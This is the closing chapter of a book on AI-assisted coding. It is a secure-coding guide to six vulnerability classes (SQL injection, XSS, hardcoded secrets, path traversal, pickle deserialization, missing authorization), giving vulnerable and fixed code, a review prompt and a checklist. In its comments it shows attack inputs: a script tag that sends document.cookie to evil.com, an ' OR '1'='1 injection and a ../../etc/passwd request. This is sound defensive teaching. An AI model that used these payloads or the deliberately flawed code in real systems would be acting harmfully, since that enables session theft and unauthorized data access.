Chapter 18

Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes

Chapter 18: Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes

AI errors are not random — they follow patterns. Training data is full of unsafe legacy code; AI prefers the shortest path, and secure implementations require extra steps. This chapter shows 6 recurring vulnerability classes with runnable wrong-and-right code examples for each, plus detection methods, .cursorrules prevention rules, a reusable AI security review Prompt, and a 20-item checklist.

Chapter goals: Recognize SQL injection, XSS, secret leakage, path traversal, insecure deserialization, and missing authorization in AI-generated code; apply the fix pattern for each; use the AI security review Prompt and 20-item checklist in your team's workflow.

Why AI-Generated Code Has Specific Security Problems

Three root causes — not random noise:

Conclusion: AI code must go through a security review, especially code that handles user input, file operations, and database queries.

Vulnerability 1: SQL Injection (Most Common, Highest Impact)

Wrong — string-concatenated SQL

def get_user(username: str):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    return db.execute(query)

# Attacker input: ' OR '1'='1
# Executed: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: returns all users, authentication bypassed

Correct — parameterized queries

# Option 1: Parameterized query (DB-API)
def get_user(username: str):
    return db.execute("SELECT * FROM users WHERE username = :username",
                      {"username": username})

# Option 2: ORM (preferred — handles escaping automatically)
def get_user_orm(username: str, db: Session):
    return db.query(User).filter(User.username == username).first()

# Option 3: Dynamic column names — use an allowlist, not concatenation
ALLOWED = {"username", "email"}
def get_by_field(field: str, value: str):
    if field not in ALLOWED:
        raise ValueError(f"Invalid field: {field}")
    return db.execute(f"SELECT * FROM users WHERE {field} = :v", {"v": value})

.cursorrules rule: "All database queries must use parameterized queries or ORM. String concatenation for SQL is forbidden."

Vulnerability 2: XSS (React-Specific Risk)

React auto-escapes JSX text content, but dangerouslySetInnerHTML bypasses that entirely. AI uses it for "convenient rich text rendering" without considering the data source.

Wrong — dangerouslySetInnerHTML on user input

function UserComment({ comment }: { comment: string }) {
  return <div dangerouslySetInnerHTML={{ __html: comment }} />;
  // If comment is user-controlled: instant XSS
  // Attacker: <script>fetch('https://evil.com/?c='+document.cookie)</script>
}

Correct — text render or DOMPurify sanitize

// Option 1: plain text — React auto-escapes (use for 90% of cases)
function UserComment({ comment }: { comment: string }) {
  return <div>{comment}</div>;
}

// Option 2: must render HTML — sanitize first
import DOMPurify from 'dompurify';

function RichComment({ html }: { html: string }) {
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
    ALLOWED_ATTR: ['href', 'target']
  });
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}

Vulnerability 3: Hardcoded Secrets

AI fills in real-looking API keys in "example" code. You commit without looking carefully, push to GitHub, and bots find and try the credentials within minutes.

Wrong — secrets in source code

stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
DATABASE_URL = "postgresql://admin:[email protected]/mydb"

Correct — all secrets from environment variables

import os
from dotenv import load_dotenv  # .env must be in .gitignore

load_dotenv()

# Use [] not .get() — fail loudly if a key is missing
stripe.api_key = os.environ["STRIPE_SECRET_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]
DATABASE_URL = os.environ["DATABASE_URL"]

REQUIRED = ["STRIPE_SECRET_KEY", "JWT_SECRET", "DATABASE_URL"]
missing = [k for k in REQUIRED if not os.environ.get(k)]
if missing:
    raise EnvironmentError(f"Missing required env vars: {missing}")

Add gitleaks to your pre-commit hooks to auto-scan staged changes for secrets before every commit.

Vulnerability 4: Path Traversal

AI concatenates user input directly into file paths. Attackers use ../../ to escape the intended directory and read system files.

Wrong — user input concatenated into file path

@app.get("/files/{filename}")
def read_file(filename: str):
    path = f"/app/uploads/{filename}"
    return open(path).read()
# Attack: GET /files/../../etc/passwd → reads /etc/passwd

Correct — normalize and verify path stays within bounds

import re
from pathlib import Path
from fastapi import FastAPI, HTTPException

BASE = Path("/app/uploads").resolve()

@app.get("/files/{filename}")
def read_file(filename: str):
    # Step 1: allowlist — only safe characters
    if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
        raise HTTPException(400, "Invalid filename")
    # Step 2: resolve real path (eliminates ../ etc.)
    path = (BASE / filename).resolve()
    # Step 3: verify real path is inside the base directory
    if not str(path).startswith(str(BASE)):
        raise HTTPException(403, "Access denied")
    if not path.exists():
        raise HTTPException(404, "Not found")
    return path.read_text()

Vulnerability 5: Insecure Deserialization

Python's pickle executes arbitrary Python code during deserialization. AI commonly suggests it for caching. If the data source is untrusted (Redis compromised, network transmission), it's a critical vulnerability.

Wrong — pickle on external data

import pickle, redis
r = redis.Redis()

def load_session(session_id: str):
    data = r.get(f"session:{session_id}")
    return pickle.loads(data) if data else None
    # If an attacker can write to Redis, they can execute arbitrary code

Correct — JSON + Pydantic validation

import json, redis
from pydantic import BaseModel

class UserSession(BaseModel):
    user_id: int
    username: str
    roles: list[str]

r = redis.Redis()

def load_session(session_id: str) -> UserSession | None:
    data = r.get(f"session:{session_id}")
    if not data:
        return None
    return UserSession.model_validate_json(data)  # safe — no code execution

def save_session(session_id: str, s: UserSession, ttl: int = 3600):
    r.setex(f"session:{session_id}", ttl, s.model_dump_json())

Rule: Never use pickle.loads() on data that crosses a trust boundary — network data, user input, Redis cache, or any external storage.

Vulnerability 6: Missing Authorization

AI generates endpoint logic but forgets authorization checks. Any logged-in user can access any other user's data.

Wrong — checks login but not ownership

@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user=Depends(get_current_user)):
    # Verifies login — but any logged-in user can query any user_id
    return db.query(Order).filter(Order.user_id == user_id).all()

Correct — verify ownership before returning data

@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user: User = Depends(get_current_user)):
    if current_user.id != user_id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return db.query(Order).filter(Order.user_id == user_id).all()

# Better: eliminate the parameter entirely — use current_user.id directly
@app.get("/api/my/orders")
def get_my_orders(current_user: User = Depends(get_current_user)):
    return db.query(Order).filter(Order.user_id == current_user.id).all()
    # No user_id in URL = no IDOR risk at all

AI Security Review Prompt

You are a security engineer. Review the following code for security issues.

Priority checklist (in order):
1. Database queries: are all using parameterized queries? Any string-concatenated SQL?
2. User input handling: is all untrusted data validated before use?
3. File operations: is the path normalized and verified to stay within the allowed directory?
4. Authorization: does every protected endpoint verify both authentication AND ownership?
5. Secrets: are all credentials read from environment variables? Any hardcoded?
6. Deserialization: is pickle/eval/exec used on data from the network or user input?

Report only real issues. For each finding include:
- File name and line number
- Vulnerability type
- Attack scenario in one sentence
- Working fix code (the correct implementation)

@[file to review]

20-Item Security Checklist for AI-Generated Code

# Check item Level
1 All SQL queries use parameterized queries or ORM — no string concatenation Must
2 User input validated before use (Pydantic / Zod / regex) Must
3 No secrets, passwords, or tokens hardcoded in source (scan git log) Must
4 File path operations are normalized and boundary-checked Must
5 Every API endpoint verifies authorization — not just authentication Must
6 Error responses don't leak stack traces, DB schema, or internal IPs Must
7 pickle/eval/exec not used on network data or user input Must
8 All API communication uses HTTPS; no plaintext sensitive data in transit Must
9 Passwords hashed with bcrypt or argon2 — not MD5/SHA1 Must
10 JWT signature algorithm and secret verified correctly; alg:none rejected Must
11 Debug mode disabled in production; detailed error pages off Must
12 Rate limiting on APIs to prevent brute-force and DDoS Recommended
13 CSRF tokens on state-changing operations (POST/PUT/DELETE) Recommended
14 Dependencies updated regularly; pip audit / npm audit runs in CI Recommended
15 Logs don't record passwords, tokens, or full credit card numbers Recommended
16 Uploaded files validated for type (MIME + extension) and size Recommended
17 Database connections use a least-privilege account — not root Recommended
18 Sensitive operations (delete, payment, permission change) have audit logs Recommended
19 Third-party CDN scripts use Subresource Integrity (SRI) verification Recommended
20 Penetration testing done periodically, especially before major feature launches Recommended

Chapter Key Points — and a Note to Close the Book

  1. AI code must be security-reviewed: The vulnerability patterns are predictable — SQL injection, XSS, and hardcoded secrets are the top three. Add this chapter's checklist to your PR template and run through it before every merge.
  2. Security rules in .cursorrules are the highest-leverage prevention: Better to prevent than detect. Three rules — no SQL concatenation, no dangerouslySetInnerHTML on user input, all secrets from env vars — eliminate 80% of AI-generated security issues before code is even written.
  3. Path traversal and missing authorization are the most overlooked: SQL injection awareness is now common; path traversal (Path.resolve + boundary check) and IDOR (URL parameter replaced with another user's ID) still appear frequently in AI-generated code.
  4. Use gitleaks as a pre-commit hook: Once a secret is pushed, it may already be compromised. Local scanning before commit is the last line of defense. Five minutes to configure, prevents major incidents.
  5. AI makes coding faster — and mistakes faster too: Build security awareness, establish team standards, review regularly. Do those three things and AI is a genuine force multiplier. Skip them and it's a liability. All 18 chapters of this book have given you the tools, techniques, and workflows — what follows is practice and iteration in real projects.

End of book: From Chapter 1 ("Why the AI Coding Era") to Chapter 18 ("AI Code Security Review"), this book has covered everything from setup to production deployment. The AI coding landscape will keep evolving — staying curious and practicing deliberately is the only way to keep up.

Rate this chapter
4.7  / 5  (11 ratings)

💬 Comments